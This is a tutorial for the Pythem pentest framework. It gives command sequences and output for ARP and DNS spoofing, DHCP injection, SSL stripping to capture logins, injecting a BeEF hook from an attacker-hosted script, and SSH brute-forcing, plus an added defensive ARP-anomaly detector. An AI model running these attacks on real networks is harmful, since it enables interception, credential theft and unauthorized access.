Pythem – Multi-Purpose Pentest Framework 2017

Pythem is a multi-purpose pentest framework written in Python. It has been developed for use by security researchers and security professionals. The tool is intended to be used only for acts within the law.

Features –

  • Only runs on GNU/Linux OS.
  • Based on Python
  • Easy to install and use

Supported attacks –

  • ARP spoofing – Man-in-the-middle (MITM).
  • Man-in-the-middle HSTS bypass – Strip SSL
  • ARP+DNS spoof – fake page redirect to credential harvester
  • DHCP ACK Injection spoofing – Man-in-the-middle
  • Man-in-the-middle inject BeEF hook
  • SSH Brute-Force attack.
  • Web page formulary brute-force
  • URL content buster
  • Overthrow the DNS of LAN range/IP address
  • Redirect all possible DNS queries to host

This tool is especially useful for DoS and MITM attacks over a LAN. You can easily define the target, gateway, interface, etc.

Installation of Pythem –

Installation can be done via git clone by typing this command:

Command: git clone https://github.com/m4n3dw0lf/pythem

Before running it, give execute permission to the install script, because it installs the dependencies, which are listed in the requirements.txt file.

For permissions, the command is “chmod +x install”.

After the installation completes, just type “pythem” in your terminal.

To view all commands and information about pythem, just type help in the same terminal.

ARP spoofing – Man-in-the-middle

pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
pythem> sniff
[+] Enter the filter: core
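
From the defending side, the ARP spoofing above leaves a trace in the victim's ARP cache: the gateway IP starts resolving to the same MAC address as another host on the LAN. The Python code below is an added example, not part of Pythem or of the original post; it parses text in the Linux /proc/net/arp format, and the sample table, all MAC addresses and the pinned gateway MAC are constructed assumptions.

```python
# Added example: flag ARP-cache signs of gateway impersonation on a Linux host.
from collections import defaultdict

# Constructed sample in /proc/net/arp format (all MAC addresses are made up).
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.179.2    0x1         0x2         00:0c:29:aa:bb:cc     *        eth0
192.168.179.145  0x1         0x2         00:0c:29:aa:bb:cc     *        eth0
192.168.179.1    0x1         0x2         00:50:56:c0:00:08     *        eth0
192.168.179.254  0x1         0x0         00:00:00:00:00:00     *        eth0
"""

def parse_arp_table(text):
    """Return (ip, mac, device) for every completed entry."""
    entries = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw, flags, mac, _mask, dev = fields
        # Flag bit 0x2 (ATF_COM) marks a completed entry; skip incomplete ones.
        if not int(flags, 16) & 0x2:
            continue
        entries.append((ip, mac.lower(), dev))
    return entries

def find_arp_anomalies(entries, gateway_ip, pinned_gateway_mac=None):
    """Return alerts: gateway MAC drift, or one MAC answering for several IPs."""
    alerts = []
    ips_by_mac = defaultdict(set)
    for ip, mac, dev in entries:
        ips_by_mac[(dev, mac)].add(ip)
        if ip == gateway_ip and pinned_gateway_mac and mac != pinned_gateway_mac.lower():
            alerts.append(f"gateway {ip} resolves to {mac}, expected {pinned_gateway_mac.lower()}")
    for (dev, mac), ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} on {dev} claims {', '.join(sorted(ips))}")
    return alerts

if __name__ == "__main__":
    # On a live host, read the real table with open("/proc/net/arp").read().
    # The pinned MAC is a constructed value; record the real one while the LAN is known-good.
    for alert in find_arp_anomalies(parse_arp_table(SAMPLE_ARP_TABLE),
                                    "192.168.179.2", "00:50:56:e4:1b:7a"):
        print("ALERT:", alert)
```

One MAC answering for several IPs also occurs legitimately (proxy ARP, routers with several addresses on one interface), so the pinned-gateway comparison is the stronger of the two signals.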

ARP+DNS spoof – fake page redirect to credential harvester

pythem> set target 192.168.179.142
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: example.com
[+] Default address to redirect is:192.168.0.6 do you want to change?[y/n]n
[+] DNS spoofing initialized.
pythem> sniff core

Man-in-the-middle DHCP spoofing – DHCP ACK Injection

pythem> dhcpspoof start
[+] DHCP Server IP address: 192.168.1.1
[+] Broadcast address: 192.168.1.255
[+] Subnet mask: 255.255.255.0
[+] Router IP address: 192.168.1.1
[+] Domain: home
[+] DNS Server IP address: 192.168.1.4 (fake)
[+] DHCP spoofing initialized.
pythem> sniff core

Man-in-the-middle HSTS bypass – Strip SSL

pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> set target 192.168.179.142
pythem> hstsbypass
pythem> sniff core

As soon as someone on the target machine logs in to gmail.com or any other HTTPS-based site, it will sniff the login credentials in clear text.

Man-in-the-middle inject BeEF hook

Start the BeEF XSS framework and get the hook script URL.

pythem> set interface eth0
pythem> set target 192.168.179.142
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> redirect start
[+] Enter the script source: http://192.168.179.145:3000/hook.js
[+] Redirect with script injection initialized.
[+] Injection URL – http://192.168.179.145:80
[+] Target was requesting: waccounts.google.com
[+] Script Injected on: ('192.168.179.1', 27813)

SSH Brute-Force attack

pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute ssh
[+] Enter the username to bruteforce: root

Sarcastic Writer